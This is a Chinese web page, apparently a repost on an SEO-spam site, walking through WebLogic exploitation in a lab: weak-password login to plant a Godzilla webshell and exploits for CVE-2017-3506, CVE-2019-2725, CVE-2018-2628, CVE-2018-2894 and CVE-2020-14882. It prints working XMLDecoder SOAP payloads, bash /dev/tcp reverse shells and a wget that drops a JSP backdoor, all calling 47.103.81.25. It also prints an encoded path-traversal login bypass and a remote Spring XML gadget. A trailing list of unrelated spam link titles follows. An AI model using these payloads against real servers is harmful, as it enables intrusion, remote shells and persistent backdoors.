当前位置: 首页 > wzjs >正文

今天体育新闻最新消息seo查询网站是什么

今天体育新闻最新消息,seo查询网站是什么,大庆室内设计公司排名,河北互联网公司一、后台弱口令GetShell 第一步:开启靶场,出现weblogic的报错页面 第二步:使用弱口令登录后台 默认账号密码:weblogic/Oracle123 weblogic常⽤弱⼝令:https://cirt.net/passwords?criteriaweblogic 第三步&#xff…

一、后台弱口令GetShell

第一步:开启靶场,出现weblogic的报错页面

第二步:使用弱口令登录后台

默认账号密码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic
第三步:上传后门程序

第四步:上传成功,使用哥斯拉进行连接

二、CVE-2017-3506-XMLDecoder反序列化漏洞

第一步:启动靶场

第二步:验证是否存在wls-wsat组件

#URL
http://47.103.81.25:7001/wls-wsat/CoordinatorPortType
第三步:在云服务器开启监听

第四步:在当前页面抓包,发送到重放器,构造payload

#payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/47.103.81.25/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
第五步:成功反弹shell

三、CVE-2019-2725

第一步:漏洞验证

#URL --- 出现以上⻚⾯,则说明存在漏洞
http://47.103.81.25:7001/_async/AsyncResponseService
第二步:在当前页面抓包 ,发送到重放器,构造payload

#payload
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://47.103.81.25/1.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>
第三步:哥斯拉生成.jsp后门程序,上传至云服务器

第四步:尝试访问1.txt,测试

第五步:发送

第六步:访问678.jsp,使用哥斯拉连接

#URL
http://47.103.81.25:7001/bea_wls_internal/678.jsp

四、CVE-2018-2628-WebLogic T3协议反序列化命令执行漏洞

第一步:开启靶场

第二步:运行Java反序列化漏洞利用工具V1.7.jar

第三步:输入靶场地址

第四步:命令执行

五、CVE-2018-2894-WebLogic文件任意上传漏洞

第一步:开启靶场

第二步:获取后台密码

#命令
docker-compose logs | grep password#用户名密码
admin:4wexvd4T
第三步:登录管理控制台

http://47.103.81.25:7001/console/login/LoginForm.jsp
第四步:设置web服务测试开启

域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚ -> 翻到最后点击保存
第五步:进入config.do文件进行设置

#URL
http://47.103.81.25:7001/ws_utc/config.do#工作目录
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
第六步:点击安全 , 添加后门程序

第七步:F12打开查看器,定位找到id,文件名为:id值_文件名称

#id值
1742623110100#文件名
1742623110100_shell.jsp#后门程序路径
http://47.103.81.25:7001/ws_utc/css/config/keystore/1742623636260_shell.jsp
第八步:尝试访问程序,成功访问到,使用哥斯拉进行连接

六、CVE-2020-14882-WebLogic远程代码执行漏洞

第一步:开启靶场

第二步:访问管理控制台,尝试绕过进入(未授权访问)

http://47.103.81.25:7001/#访问管理控制台
http://47.103.81.25:7001/console/login/LoginForm.jsp#使⽤以下url绕过登录认证(../)
http://47.103.81.25:7001/console/css/%252e%252e%252fconsole.portal
第三步:远程加载XML文件拿到Shell

#1.xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
<constructor-arg>
<list>
<value>bash</value>
<value>-c</value>
<value><![CDATA[bash -i >& /dev/tcp/47.103.81.25/6666 0>&1]]></value>
</list>
</constructor-arg>
</bean>
</beans>#访问恶意xml文件
http://47.103.81.25:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://47.103.81.25/1.xml")
第四步:在云服务器开启监听,成功反弹shell

                                                                                                                                FROM  IYU_

http://www.dtcms.com/wzjs/435115.html

相关文章:

  • 建德营销型网站建设沈阳seo团队
  • 做网站能用思源黑体吗百度云电脑版网站入口
  • 云空间可以做网站免费建站免费推广的网站
  • 到位app做网站需要些程序深圳百度关键词排名
  • 如何做网站联盟痘痘怎么去除有效果
  • 武汉未来田网站建设推广百度移动端模拟点击排名
  • 成品网站 高端北京疫情最新消息情况
  • 音频文件放到网站空间里生成链接怎么做关键词推广是什么
  • 海外兼职网站建设网络推广费用高吗
  • 网站怎么做公司网络广告的类型有哪些
  • 苏州做网站的公司有哪些chatgpt入口
  • 网站系统找不到指定的文件如何推广一款app
  • 网站如何后台管理seo做的比较牛的公司
  • 做cra需要关注的网站成功的营销案例及分析
  • 沈阳做网站建设黄页网络的推广网站有哪些
  • 湖南响应式网站建设费用军事新闻头条
  • 做网站用什么源码最好bing搜索引擎国际版
  • 东莞免费做网站公司推广产品的文案
  • 东莞食品公司东莞网站建设企业员工培训课程
  • 县建设局 协会网站靠谱的影视后期培训班
  • 石家庄专业制作网站爱站网站长seo综合查询
  • 阿里云服务器 网站模板怎么建网站教程图解
  • 医院网站推广方法seo网站关键词快速排名
  • 动态网站跟静态网站dy刷粉网站推广马上刷
  • 做网站需要哪些技术支持游戏推广员
  • 中央农村工作会议指出seo快速排名软件推荐
  • 鲅鱼圈网站开发哪家好哦职业技能培训中心
  • 企业网站建设的缺点制作一个网站的基本步骤
  • 签证网站建设惠州百度seo哪家好
  • qq空间做淘宝客网站提高网站权重的方法